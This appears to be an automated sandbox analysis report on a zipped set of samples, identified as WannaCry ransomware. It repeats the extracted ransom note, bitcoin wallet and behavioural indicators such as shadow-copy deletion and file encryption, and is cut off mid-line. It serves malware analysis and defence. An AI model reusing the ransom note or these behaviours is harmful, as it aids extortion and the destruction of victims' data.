Analysis
-
max time kernel
141s -
max time network
148s -
resource
win10v191014
Task
task1
Sample
0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource
win7v191014
0 signatures
Task
task2
Sample
0b627b4eca9b9e8bd04a0d1a103876f6e0fa91049fd0b51bae9ae41acaacf15b.doc
Resource
win10v191014
0 signatures
Task
task3
Sample
0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource
win7v191014
0 signatures
Task
task4
Sample
0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
Resource
win10v191014
0 signatures
Task
task5
Sample
91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource
win7v191014
0 signatures
Task
task6
Sample
91B5DB3C0CCBD68BD04C24571E27F99D.msi
Resource
win10v191014
0 signatures
Task
task7
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win7v191014
0 signatures
Task
task8
Sample
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Resource
win10v191014
0 signatures
Task
task9
Sample
fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource
win7v191014
0 signatures
Task
task10
Sample
fe9d72dd4b046bafdd144902ab570297629f83d06afb5a9ba7703382a29d588f.exe
Resource
win10v191014
0 signatures
General
-
Target
Supergevaarlijkk.zip
-
Sample
191029-p1j1431a9n
-
SHA256
6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac
Score
N/A
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\Admin\Desktop\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\Admin\Documents\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Recovery\WindowsRE\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\Admin\AppData\Local\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\Admin\AppData\Roaming\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\Admin\Downloads\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\Admin\Music\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\Admin\Pictures\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\All Users\Microsoft\AppV\Setup\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\All Users\Microsoft\Diagnosis\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\All Users\Microsoft\Network\Downloader\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\All Users\Microsoft\UEV\Scripts\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\All Users\Microsoft\User Account Pictures\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\All Users\Microsoft\Windows\Caches\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\All Users\Microsoft\Windows Live\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Extracted
Path
C:\Users\All Users\Microsoft\Windows NT\MSScan\@[email protected]
Family
wannacry
Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption.
Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Next, please find an application file named "@[email protected]". It is the decrypt software.
Run and follow the instructions! (You may need to disable your antivirus for a while.)
Q: How can I trust?
A: Don't worry about decryption.
We will decrypt your files surely because nobody will trust us if we cheat users.
* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window.
�
Wallets
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Signatures
-
Drops startup file 6 IoCs
description ioc pid Process File created (read-only) C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD628.tmp 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD628.tmp 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File deleted C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD628.tmp 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File created (read-only) C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD69C.tmp 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD69C.tmp 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File deleted C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD69C.tmp 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeTcbPrivilege 2968 taskse.exe Token: SeBackupPrivilege 1104 vssvc.exe Token: SeRestorePrivilege 1104 vssvc.exe Token: SeAuditPrivilege 1104 vssvc.exe Token: SeIncreaseQuotaPrivilege 1572 WMIC.exe Token: SeSecurityPrivilege 1572 WMIC.exe Token: SeTakeOwnershipPrivilege 1572 WMIC.exe Token: SeLoadDriverPrivilege 1572 WMIC.exe Token: SeSystemProfilePrivilege 1572 WMIC.exe Token: SeSystemtimePrivilege 1572 WMIC.exe Token: SeProfSingleProcessPrivilege 1572 WMIC.exe Token: SeIncBasePriorityPrivilege 1572 WMIC.exe Token: SeCreatePagefilePrivilege 1572 WMIC.exe Token: SeBackupPrivilege 1572 WMIC.exe Token: SeRestorePrivilege 1572 WMIC.exe Token: SeShutdownPrivilege 1572 WMIC.exe Token: SeDebugPrivilege 1572 WMIC.exe Token: SeSystemEnvironmentPrivilege 1572 WMIC.exe Token: SeRemoteShutdownPrivilege 1572 WMIC.exe Token: SeUndockPrivilege 1572 WMIC.exe Token: SeManageVolumePrivilege 1572 WMIC.exe Token: 33 1572 WMIC.exe Token: 34 1572 WMIC.exe Token: 35 1572 WMIC.exe Token: 36 1572 WMIC.exe Token: SeTcbPrivilege 4240 taskse.exe Token: SeTcbPrivilege 1704 taskse.exe -
Uses Volume Shadow Copy Service COM API 13 IoCs
description ioc pid Process Key opened \Registry\Machine\Software\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623} 716 vssadmin.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623} 716 vssadmin.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\TreatAs 716 vssadmin.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\ 716 vssadmin.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\InprocHandler32 716 vssadmin.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\InprocHandler 716 vssadmin.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623} 1104 vssvc.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623} 1104 vssvc.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\TreatAs 1104 vssvc.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\ 1104 vssvc.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\InprocServer32 1104 vssvc.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\InprocHandler32 1104 vssvc.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\InprocHandler 1104 vssvc.exe -
Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs
description ioc pid Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer 3920 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName 3920 svchost.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 4884 wrote to memory of 4928 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 72 PID 4884 wrote to memory of 4956 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 74 PID 4884 wrote to memory of 4328 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 77 PID 4884 wrote to memory of 2952 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 78 PID 2952 wrote to memory of 4472 2952 cmd.exe 80 PID 4884 wrote to memory of 3032 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 84 PID 4884 wrote to memory of 4188 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 85 PID 4884 wrote to memory of 4116 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 86 PID 4116 wrote to memory of 4064 4116 cmd.exe 88 PID 4188 wrote to memory of 3364 4188 @[email protected] 90 PID 4804 wrote to memory of 4752 4804 SppExtComObj.exe 93 PID 4884 wrote to memory of 2968 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 94 PID 4884 wrote to memory of 4236 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 95 PID 4884 wrote to memory of 4352 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 96 PID 4352 wrote to memory of 3780 4352 cmd.exe 98 PID 4884 wrote to memory of 4600 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 99 PID 4064 wrote to memory of 844 4064 @[email protected] 101 PID 844 wrote to memory of 716 844 cmd.exe 103 PID 844 wrote to memory of 1572 844 cmd.exe 106 PID 4884 wrote to memory of 4896 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 114 PID 4884 wrote to memory of 4240 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 115 PID 4884 wrote to memory of 5092 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 116 PID 4884 wrote to memory of 1704 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 117 PID 4884 wrote to memory of 4012 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 118 PID 4884 wrote to memory of 4844 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe 119 -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc pid Process Set value (str) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Set value (str) \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" 4236 @[email protected] -
Loads dropped DLL 1 IoCs
pid Process 3364 taskhsvc.exe -
Deletes shadow copies 2 TTPs 2 IoCs
pid Process 716 vssadmin.exe 1572 WMIC.exe -
Drops file in system dir 5 IoCs
description ioc pid Process File opened for modification C:\Windows\Debug\ESE.TXT 2076 svchost.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp 2076 svchost.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp 2076 svchost.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp 2076 svchost.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp 2076 svchost.exe -
description ioc pid Process File opened for modification C:\Users\Admin\Desktop\WritePop.pptx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\OpenSplit.xltx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\SkipUnlock.xltx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Desktop\SuspendAssert.xlsm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\Are.docx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\Files.docx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\Opened.docx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\Recently.docx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\SubmitDebug.ppt 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\These.docx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\WriteDismount.xlsx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\AddDismount.pptm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\ApproveMeasure.docm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\CloseLock.potx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\DisconnectCompare.xltm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\NewUnprotect.xltm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\OutConvert.docm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Documents\ReceiveEnable.pot 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\ExpandPing.doc 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Downloads\SwitchLock.docx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Downloads\TraceUninstall.xls 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\Music\UninstallGet.docx 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\CompleteInvoke.ppsm 4884 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe File opened for modification C:\Users\Admin\AppData\Roaming\OpenTest.dotm 4884 